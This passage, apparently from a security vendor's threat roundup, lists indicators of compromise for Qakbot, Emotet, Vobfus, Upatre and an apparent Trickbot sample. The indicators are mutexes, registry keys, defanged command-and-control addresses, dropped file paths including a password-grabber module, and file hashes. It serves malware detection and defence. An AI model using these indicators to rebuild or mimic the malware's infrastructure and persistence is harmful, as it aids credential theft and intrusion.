\n`ident[.]me` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\netcloud` | 64 \n`%System32%\\Tasks\\netcloud free disk` | 64 \n`%APPDATA%\\netcloud\\settings.ini` | 64 \n`%APPDATA%\\netcloud\\data\\systeminfo64` | 4 \n`%APPDATA%\\netcloud\\data\\pwgrab64` | 2 \n`%APPDATA%\\netcloud\\data\\pwgrab64_configs\\dpost` | 2 \n \n#### File Hashes\n\n` 01665c3044d0c07559850f4c63b0e83a75d377d47cbb024109af959ab07a84ab 029d508d8b0b8d85d4e9409b4fce7d1e77278e9c287ea413bfc6ef74b04f3f62 02b56e22b5b87c10e1aaa55a64d023c146705bec60a05f663383c58ad2d46ec9 04915554da413b0eec1c972c40dd73f01494e0babbb952511bc471831f09d66a 07037779cf0fd1203023ab1c5d0ca29103ec20b86ef4a1352e0eae887522aaf5 0b0812b19376da99480f2eaa6ef5c50b0ddef28e861d58f72ea2f321d8d5f4a7 11b52fd22db6a8407a7b185bbff4731813f3e5ade255545b0c5aa75e71001d40 139682b035166c0554038c7a3d41d21c1224ca4d8a1f3dc2fdc78b5d162980a3 1452da4d87422fbce37fa81c0357b9093120f39849a39a6b49529d2e88c24601 15e767c8416fff66195618b591a2a2869b42075a81962d760e644504ecbccd7d 1bcc2e0e40cb671020249c818d9580345498198e06e83242ec54c5666c13eeac 1f64de67c63364947a52b85977c30e101cb27151c9d21759db0a7ea2d20d1c76 1fd9de5a0da8baf970b071eec8072dbe8e166c52a520252a7bad4c6cccdb6f5a 2211518528d8df3b3a37b83807f27b3c48e8dc68e427be3d693775dd9281d3dc 2329e7a18e95750266b5865d2cebb2b0ab2db296e99735b1fcf174eabd0364bc 25ed6d3f3dcaa2fb50d9b98b4b18ce5552b8e7f7edb34036dbe223a0e594c61e 28d5358cee665b777f608ab2994f09baeea9f98a53f7631dc18412b58e279e79 2c5e9d6e2caf1b7d0b3d34eefe3f6cba433c5f4d9cb1056788efba86d64070c7 2cb27358ab67c8b99b3ef38653c6e529daf2782415ee4025977853dbecba4135 2fcd6ec5753d814c537cf1d8c0bd40fd71da35fc0daa3464c71061feabccc003 3899c0d52fb831b58971b8cc3676b819623c3cdf394404441e9e3fc5149f2924 39812d745606743e797291736409505e7c8fee6708f1b9cdfd81db696b045f0b 3c0fdeaf8672109d78f05a5409aa4d1a64970e0317d00dce93c2f850ed315444 3ce742d661cf7896361b4419bffe4b457db5996bb437e386ac8725a32ea3775c 3cfd3b1da2d19d3d79479a35570aa2f8c53c5a865307ae39c45dbab34ecd1eb3 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-JTRDz8oSW50/XaCYva53LiI/AAAAAAAACwA/280I47e6txEPYBLQPdpqONY_nKCkzbvWQCLcBGAsYHQ/s1600/2c5e9d6e2caf1b7d0b3d34eefe3f6cba433c5f4d9cb1056788efba86d64070c7_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-KJVTe4bprVI/XaCYzw4H7VI/AAAAAAAACwE/MpNwJCdyIWExayqR9lJI-HVKguGjEsqQACLcBGAsYHQ/s1600/815ba51dcf704f5d77d74f409b6ad6b8196c3f98f51a1f300e9e156597040a1a_tg.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Dropper.Qakbot-7287972-0\n\n#### Indicators of Compromise\n\nMutexes | Occurrences \n---|--- \n`<random, matching [a-zA-Z0-9]{5,9}>` | 9 \n`<random, matching [a-fA-F0-9]{10}>` | 6 \n`NO_HIDE` | 2 \n`Global\\eqfik` | 1 \n`Global\\epieuxzk` | 1 \n`Global\\ulnahjoi` | 1 \n`Global\\utjvfi` | 1 \n`Global\\siexlcvo` | 1 \n`Global\\3e356201-e784-11e9-a007-00501e3ae7b5` | 1 \n`9a1e0bdf466b43e51e62125b6de07886\u00d0\u00f7# Administra` | 1 \n`Global\\zmzqw` | 1 \n`Global\\hzquyt` | 1 \n`Global\\orprmhqn` | 1 \n`llvmspnzmgf` | 1 \n`Global\\emiudb` | 1 \n`siexlcvo/W` | 1 \n`Global\\okqxsvm` | 1 \n`hnqgbtxnpbgb` | 1 \n`Global\\awfury` | 1 \n`Global\\mesgra` | 1 \n`Global\\esute` | 1 \n`Global\\caypop` | 1 \n`azvfitrmerda` | 1 \n`Global\\yweieuzg` | 1 \n`Global\\lajpa` | 1 \n \n*See JSON for more IOCs\n\nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`69[.]241[.]80[.]162` | 8 \n`69[.]241[.]74[.]170` | 8 \n`69[.]241[.]108[.]58` | 8 \n`69[.]241[.]106[.]102` | 8 \n`209[.]126[.]124[.]173` | 7 \n`66[.]96[.]134[.]31` | 6 \n`66[.]7[.]210[.]190` | 6 \n`65[.]182[.]187[.]52` | 6 \n`181[.]224[.]138[.]240` | 5 \n`69[.]64[.]56[.]244` | 5 \n`162[.]144[.]12[.]241` | 5 \n`208[.]100[.]26[.]234` | 3 \n`64[.]34[.]169[.]244` | 3 \n`108[.]61[.]103[.]175` | 3 \n`193[.]28[.]179[.]105` | 3 \n`12[.]167[.]151[.]78/31` | 3 \n`216[.]58[.]217[.]142` | 2 \n`195[.]22[.]28[.]222` | 2 \n`173[.]227[.]247[.]50` | 2 \n`12[.]167[.]151[.]89` | 2 \n`12[.]167[.]151[.]81` | 2 \n`195[.]22[.]28[.]199` | 1 \n`173[.]227[.]247[.]49` | 1 \n`173[.]227[.]247[.]34` | 1 \n`173[.]227[.]247[.]59` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`jacksonville-a[.]speedtest[.]comcast[.]net` | 8 \n`stc-sjos-01[.]sys[.]comcast[.]net` | 8 \n`stc-fxbo-01[.]sys[.]comcast[.]net` | 8 \n`www[.]ip-adress[.]com` | 8 \n`stc-hstn-03[.]sys[.]comcast[.]net` | 8 \n`boston[.]speedtest[.]comcast[.]net` | 8 \n`houston[.]speedtest[.]comcast[.]net` | 8 \n`sanjose[.]speedtest[.]comcast[.]net` | 8 \n`jacksonville[.]speedtest[.]comcast[.]net` | 8 \n`wpaoyqevfvmqquvpfwo[.]com` | 3 \n`ageanrzekiycakzrswcq[.]com` | 3 \n`utglavlafksmzfcniumfwwbm[.]biz` | 3 \n`wyrlmssiybtkxemblgkturpw[.]net` | 3 \n`qguuivkqppwohlzzvjv[.]org` | 3 \n`ohfckvgylddiulbtgcrdijtpl[.]org` | 3 \n`zhkclrrbgufzsgljzohs[.]com` | 3 \n`evvedpvqyno[.]net` | 3 \n`cyiynudufvqmswxgtdkgyal[.]org` | 3 \n`fmncuwynktocekwqmthsr[.]net` | 3 \n`hrmmnxigwodcsbqhcezedv[.]net` | 3 \n`ohnzjsjoyxmkfpafaouujked[.]biz` | 3 \n`rpagfveavil[.]com` | 3 \n`ocqfamsdr[.]org` | 3 \n`sso[.]anbtr[.]com` | 2 \n`tnqnpjthcwhhit[.]biz` | 2 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcv.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcvo.exe` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq\\eqfi.dll` | 1 \n`%APPDATA%\\Microsoft\\Eqfikq\\eqfik.exe` | 1 \n`%HOMEPATH%\\APPLIC~1\\AuthHost_86.exe` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\cemiudb32.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiud.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiudb.exe` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\emiudb32.dll` | 1 \n`%APPDATA%\\Microsoft\\Emiudbm\\qaodxae.exe` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\csiexlcvo32.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\siexlcvo32.dll` | 1 \n`%APPDATA%\\Microsoft\\Siexlcvoi\\u\\siexlcvo.exe` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypo.dll` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypop.exe` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\caypop32.dll` | 1 \n`%APPDATA%\\Microsoft\\Caypopa\\ccaypop32.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\cnkswh32.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nksw.dll` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nkswh.exe` | 1 \n`%APPDATA%\\Microsoft\\Nkswhk\\nkswh32.dll` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\cteubkc32.dll` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\ojpgopoc.exe` | 1 \n`%APPDATA%\\Microsoft\\Teubkce\\teubk.dll` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 00ff1db58b6f1e59ab2c2bf8e56160505a45d4a81f6fe1eaa929e64fb1721579 064778a5c62de64d9209efd2a1d07d51e5bba27dec7304adb16cb0f477990da7 10498726da41ce76941828ba2645cd142d14345730ed27ef477ef3360776b70e 1550ddeb6bedfa869544e6acff1b99deef5ed36c5d3e53bb8c54a7dfc1ee7979 16e32d59b24b270c97fc9003ce99d52bbd5d2f8f71066a7ae89489b70230b6ea 2a4d5212548373f2036751006f472fd59796cb1f3ea0a5e3b00ff257dda42d90 2a98486961a037fc69ad76a352cdbd94b9e9b20e935ea2223632616af9cf9164 2f8eaa9d09eea245e077d855496d325833f431c565b0caf376694a20786a360d 33e8352baa3fd5c8657f950f6853c852ab5bc7a8738ef0100393e8840170f689 3c671a2c98bad1d21523542d92d3e7e64f10dc11b71ad877a12d3c716f79d6c5 3ed342a425980d09017f40042c3bc38c995f80b25ebc0ce54f57aa247a399972 433da825e9d75917a8e935ce67e352de3300c2276b8e1e4088ad353f1dc563cd 4567101b5264de0d437095f3dad638f1f663eca77eb737f1c8188133786c42a3 49a262416b8af5718487c966f6d328f12b7dd39c4e48c1d12ec99eb6f67b5bf7 5008602076bc658f669bcbdcdcdae8ac0db03df3d67d59cc8a594916c7e0eab7 546fe2283bec932d0e579545928b7c61aa4865891ae2ae270311cb43d37f24fc 5694eba592c8d2dc736d820dfe10f1cb70fc613595349358e67651b04f8d5f9c 5873b0a3726c51faf9e15170f2cc2cf907da40bd6535886c2f4cc5eb4d1b677f 5a779b62299bf87288404f408ffd1ca26ffb365a1a80a3f0be02634dbb6b0acd 61e897720193eb60766425f7952795081b220bd3fcb84693d127ae08cdc7fd77 64a7ea2afabd89b89154b3e9165e4821194657eaa2df6f3c05513ac57f4269a1 67d275ebe2e3e3653d1a9dfc9e68abe38adaca68e30d4335e974fe9393ed1166 7103e2d1e6b0cb025ba011e3b71b959beb9dba33e919d22ce710703b0cecc9d3 7173180702f16103ff9e12dc30a4d35ffe8e59fed07a9b85b1a8051cccc3443c 75294d7224051e0fc6f7a583941ed6be64270f2296f01a2f907c475bcc604296 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-diOr4nVxLus/XaCZODwtgoI/AAAAAAAACwI/i6MnwDpChPAzELBy_c8prmEqG8io00PAQCLcBGAsYHQ/s1600/7103e2d1e6b0cb025ba011e3b71b959beb9dba33e919d22ce710703b0cecc9d3_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-vIPJRGd5KIc/XaCZdiQvCUI/AAAAAAAACwQ/8yuvzeDBGn4bdI32E86fo_L7eHsk104QgCLcBGAsYHQ/s1600/9a1e0bdf466b43e51e62125b6de07886d5cad816c12362db837d9496d9ee3afa_tg.png>)\n\n \n\n\n#### Umbrella\n\n[](<https://1.bp.blogspot.com/-gRpByRbRd6k/XaCZlQKaDSI/AAAAAAAACwY/MT_B_Pq7tIYRN7X8Fj4OJ1fKopA1yoXMQCLcBGAsYHQ/s1600/2a98486961a037fc69ad76a352cdbd94b9e9b20e935ea2223632616af9cf9164_umbrella.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Trojan.Emotet-7287811-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Type ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Start ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ErrorControl ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ImagePath ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: DisplayName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: WOW64 ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: ObjectName ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL \nValue Name: Description ` | 13 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\SERVICES\\MINIMUMPIXEL ` | 13 \nMutexes | Occurrences \n---|--- \n`Global\\I98B68E3C` | 13 \n`Global\\M98B68E3C` | 13 \n`Global\\M3C28B0E4` | 13 \n`Global\\I3C28B0E4` | 13 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`80[.]11[.]163[.]139` | 11 \n`85[.]54[.]169[.]141` | 10 \n`185[.]14[.]187[.]201` | 4 \n`45[.]79[.]188[.]67` | 4 \n`63[.]142[.]253[.]122` | 4 \n`67[.]225[.]229[.]55` | 3 \n`193[.]70[.]18[.]144` | 2 \n`193[.]252[.]22[.]86` | 2 \n`17[.]36[.]205[.]74` | 2 \n`212[.]227[.]15[.]142` | 2 \n`213[.]180[.]147[.]145` | 2 \n`52[.]96[.]40[.]242` | 2 \n`62[.]149[.]157[.]55` | 2 \n`217[.]116[.]0[.]228` | 2 \n`62[.]149[.]128[.]179` | 2 \n`173[.]194[.]68[.]108/31` | 2 \n`82[.]223[.]190[.]138/31` | 2 \n`62[.]28[.]40[.]155` | 1 \n`82[.]223[.]191[.]228` | 1 \n`84[.]232[.]4[.]63` | 1 \n`5[.]56[.]56[.]146` | 1 \n`37[.]187[.]56[.]166` | 1 \n`134[.]0[.]12[.]48` | 1 \n`213[.]0[.]77[.]51` | 1 \n`208[.]91[.]198[.]107` | 1 \n \n*See JSON for more IOCs\n\nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`smtp[.]office365[.]com` | 2 \n`smtp[.]outlook[.]com` | 2 \n`smtp[.]1and1[.]es` | 2 \n`mail[.]comcast[.]net` | 2 \n`mail[.]1und1[.]de` | 2 \n`outlook[.]office365[.]com` | 2 \n`smtp[.]one[.]com` | 2 \n`smtp[.]orange[.]fr` | 2 \n`smtp[.]serviciodecorreo[.]es` | 2 \n`mail[.]gmx[.]net` | 2 \n`smtp[.]poczta[.]onet[.]pl` | 2 \n`mail[.]aruba[.]it` | 2 \n`pop3s[.]aruba[.]it` | 2 \n`smtp[.]pec[.]aruba[.]it` | 2 \n`smtp[.]myfbmc[.]com` | 1 \n`mail[.]amazon[.]com` | 1 \n`smtp[.]amazon[.]com` | 1 \n`mail[.]bellnet[.]ca` | 1 \n`mail[.]hotmail[.]es` | 1 \n`smtp[.]ogicom[.]pl` | 1 \n`smtp[.]my[.]tnt[.]com` | 1 \n`mail[.]pec[.]it` | 1 \n`mail[.]kovalam[.]es` | 1 \n`smtp[.]myslide[.]cn` | 1 \n`smtp[.]tepore[.]com` | 1 \n \n*See JSON for more IOCs\n\nFiles and or directories created | Occurrences \n---|--- \n`%SystemRoot%\\SysWOW64\\<random, matching '[a-zA-Z0-9]{4,19}'>.exe` | 12 \n`\\TEMP\\yc3qjv_812.exe` | 1 \n`\\TEMP\\njrfqcj58z_23190.exe` | 1 \n`\\TEMP\\b2_13022603.exe` | 1 \n`\\TEMP\\5tnlmwuu_6728847347.exe` | 1 \n`\\TEMP\\feqxn9l_08751690.exe` | 1 \n`\\TEMP\\u1p1rr_2846411837.exe` | 1 \n`\\TEMP\\93cumzh_740237.exe` | 1 \n`%SystemRoot%\\TEMP\\DFFB.tmp` | 1 \n \n#### File Hashes\n\n` 0d2fcaa55a4fa60ddb207a884d8708616afe216172606cb34428696d94d02b55 1d79c23865675ea988e8da616d87729fc029e3da8655a452ec8603c2645ed29c 1eda8a1b220b335de0e0dcc4b1c370f063d3bb8179e78e1aa5aa07d97182e50e 2f2fde0c36731205d5c8139450b3e65c99c4b101632f9e5b359d241bd39bc854 4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290 6e0ff7d8aabe7604957239a4217e8acd18261216c6fd4447c3e3ea061062bad5 7999aecb854548554573e807e3099b3285ffa31244668bda61a60ca02763de48 c2b0637eaa88c02f22d551ece7de3220d4888a7882676fd7b51c6c577140ce51 ce8949e5a1b41b1b1ff2d6d432aef7af6db3c4308b4e58839b9e6958846cd24e d5128c8528eaf67f71aa26c53db2b9035ee95849f03ab991ae9805bf4c07f496 e142a57f84461cad1faea965d00decb6ed53eb65fc884acd52ffede5454d1a4e e28a38d8fdd96021b0391fc8a2f0e88da19143a6084ab6a64ff93fdb1d2c9ee2 fe84dbdcefa7c810abd780e0ca47c5bdfaa8c27146b810e2d784d1b00a077aa0 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-SRQWZZjN7x4/XaCar6FuH3I/AAAAAAAACwo/0VchjmmiZgE-w8OUhfDzDKGUXKCyfxNAACLcBGAsYHQ/s1600/4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-IBunbnm_ww4/XaCavKiuXiI/AAAAAAAACws/6ZkBDPWOzwIgP0dPFndg_9aH0wWd4sqggCLcBGAsYHQ/s1600/4f525a377c92170b4e0fdb377d84e7046be3fabf13020542889dabfceb3f3290_tg.png>)\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7198158-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 23 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xaawee ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juemauy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zltip ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wkxid ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: leohuow ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: kuoova ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: vjdoq ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: beyuk ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baeuqo ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: lieagu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juohoah ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: taeele ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baaqaic ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wmquoz ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qeodux ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ziiluet ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mrlot ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: coawi ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ceqav ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: gejay ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: baule ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: xeezua ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mouzui ` | 1 \nMutexes | Occurrences \n---|--- \n`A` | 23 \n`Global\\d11cb3c1-e7ca-11e9-a007-00501e3ae7b5` | 1 \n`Global\\02adca01-e7cb-11e9-a007-00501e3ae7b5` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]videoall[.]net` | 23 \n`ns1[.]videoall[.]org` | 23 \n`ns1[.]player1532[.]com` | 23 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 23 \n`\\$RECYCLE.BIN.lnk` | 23 \n`\\System Volume Information.lnk` | 23 \n`\\Documents.lnk` | 23 \n`\\Music.lnk` | 23 \n`\\New Folder.lnk` | 23 \n`\\Passwords.lnk` | 23 \n`\\Pictures.lnk` | 23 \n`\\Video.lnk` | 23 \n`\\<random, matching '[a-z]{4,7}'>.exe` | 23 \n`%HOMEPATH%\\<random, matching '[a-z]{5,7}'>.exe` | 23 \n`E:\\$RECYCLE.BIN.lnk` | 22 \n`E:\\autorun.inf` | 22 \n`E:\\x.mpeg` | 22 \n`E:\\System Volume Information.lnk` | 22 \n`E:\\Music.lnk` | 22 \n`E:\\Passwords.lnk` | 22 \n`E:\\Pictures.lnk` | 22 \n`E:\\Documents.lnk` | 22 \n`E:\\New Folder.lnk` | 22 \n`E:\\Video.lnk` | 22 \n`E:\\<random, matching '[a-z]{4,7}'>.exe` | 22 \n`E:\\RFJ.ico` | 1 \n`\\RFJ.ico` | 1 \n`E:\\baaqaicx.exe` | 1 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 09be96cf7eaf5a8b9e6231dc9f5760df58907a9c8dfb996e406361c3c72e5aa7 0c114b0894e482f57f0909cbd8b8dced3a8d6b20ec50139ccafdc81c1f21d6f2 107add01286993501566a44c448e321e27d3dadef2e2b62162b158cee42f4b80 210c1a435f47d5bca6300a4a323aa416e8edd2855946a9b5dc13f525e2061122 261ba2deae2f40205c12ecaa69ac285e3db2669ace697f4f52006aaca3046137 2642ae8489bf119064a09e9919cf06f92bc5b5882613c673745ffe89b34c2f43 30e340533c70f200d86348c10c78164a165e17a88f62b344e2b76f035386beae 323f9bcc53cdf71e937974d6523174ebb74151af8928d1148d0476c13b3e1622 37d2c4a0c7b4640261d4eae7bfe234eb4029a5686589e96fa78d9da20bf2add8 408680beb42a3d4123ca4136cb02431efdb2efd112d546a378dfea96dd042f5d 423ddc412baf3a6aa9637d6258b7309f08ed1e1bc9c2dddc30cc25732998e42c 46a8888ab48c79a9bdef4cf4ff58f5f58feb8ad6e3926a6ee98f7ea1dc2b383a 4e8f5a3497e7263ad12bdb242fdcbbd9c2d1ff85e862b263ce4b4d138f00002c 5642cb5f8c9d9115143cf67b67b50327dc6ac07c78e87334f52d3a89ef7e855c 575c4e03f446b9ae91769cc7be8b7cc8aa451d607615a69ac0797190240f0bff 5c3a99fa29ab5917f2facf4383dd6284c2fd4c93c0aa9a16cf5a8b605ce3521c 605712812595a21fae8b728974d328ecc2811792cec2f0808653d2ea8ee556c2 610519390720b741a8b2de2686575141bf8839473abdc06ffa9ecfd7efb88a3c 640f88b445819b50d801f63bba996635c07883cf245ddca2f39b592ce07d0a30 777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab 7f285a63779f27c9793b5fdcdcc9f8e8d48207298cb4c3cd18e27889c2dd052a 8232b50475cf369b325dc6866d6b88c27245faf7e572a3629b5c0ad3a88cbd72 84b677c976458077b79120064fe7aa275ad33d19d7651425f3faf6cd717fc520 8536b9a9da4f0b6930ed148166800147062e93f6c31ad70f61eb7ed174383c80 89f1ede2d77a45043f2ce760265d21a512f5e5b011cde43f76c3b968214530e5 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella |  \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-npiRaUMl5QI/XaCbL0aozgI/AAAAAAAACw4/LnDHJMeh_OYLyc-o9kM-VB7fLsk5ohDsgCLcBGAsYHQ/s1600/777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab_amp.png>)\n\n \n\n\n#### ThreatGrid\n\n[](<https://1.bp.blogspot.com/-AMmyrvJ7XZc/XaCbPzyiIyI/AAAAAAAACw8/Dgd1uJRdRNI9ISwCShI7TnLNrnhStOM1wCLcBGAsYHQ/s1600/777a8c8f5ffa5c992ea0991e99b6be9f6ed560768154f6273f42c2547e6454ab_tg.png>)\n\n \n\n\n#### Umbrella\n\n* * *\n\n### Win.Dropper.Upatre-7196259-0\n\n#### Indicators of Compromise\n\nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\szgfw.exe` | 43 \n \n#### File Hashes\n\n` 0209860624b9650a80e8e7ccd913c68bbd5e4be9e503c2a1b554c6b3b94861a1 0755dff6699aebb40a37368f78ed9a7b66d3e24d039af8cdd2ad13b8ef969273 0e2cb655432353bc5f362692d75f76b1deb6d4c339db1eacb671731c5f23a733 1191f1f7a73c262102b8ec25f2aecefc26eef287e55934e608ba510b45bff3db 11aa23a13c9a53dae82684af6adf9835fe027550d5b9bfd21604ab1261c97224 25f1eb50680c50626387a6e2c28a9278172dadbb61113f984a9c0074db4a3514 35588e1d2203194ae0524d551d9a5d45bccbfbd9ef226a25e223c4e626db8e7e 37715e5cfc32e42ccd741a8ca0b17276c76b9d28c2ab4ab4edc4ba712cfe98a4 47b69664dd70b8ed9e0f369640f4dfd27a5a33b8bd3d83d572b667551d6465cd 47cbf5466f14bacd5dae7a217a85673048245844e39d081ce4009aa8bbdf0743 48b14ad94dbfe648d7ef4cbce8debeec6b009d9972cb026f7f4ecfea72ae380d 4c6c1e0eb3b508e3bd525b4ce71a1309d231b218f7172bfb5da57a93a050ab5c 4d30d13f5454bc30c92643657d4113a4008e09cd06491e1f73801a14b5415cf5 50bf198fb00ff18f6b08b9aff48c8b5ffcc85cc0dcda23a0359f413113fd6207 51cd17e592d2ebadfd3f15ca6b542f78b2adb4f26b7eaf8c254e849ee141bcc4 52f3ac52e9e2e9ebaba6da86ea629ad07b2017a44a5be6f66a576853341cc1ca 5cdc406d0cfc60b4a6b5cce5411932f250bcf7c60863e71111f461130c2d942f 607473f50e64388087985abb0bb05caa8688a1a17c25607508bb2a3a8a62fc13 607ac8ad70dc43765ea3954c09b2dbe320f7dbe4fe9fee9b07fab9e855aef37b 6516b8c920ae407765804372470187aa6749d1f598e87b7dbe8bf47291039568 658f7d3524bc9db586321be2fb22b1d832cd6f80328dcdbecdfc2734ff45487a 6812985cee6342855219205500bd1bb53300d552f17b88dbeeab1cdad32e55bf 6be61289884c2bd01ddade32649d23fac7bc0ba4591f3eed911101eb44c5181b 6f8ed68f17904767ecd16b1cb1943caa8f474912bffc930082e64512fa48f96f 75c817a4d49bc40781537143aabad6f0496129120503b7276854e9db15b4a965 `\n\n*See JSON for more IOCs\n\n#### 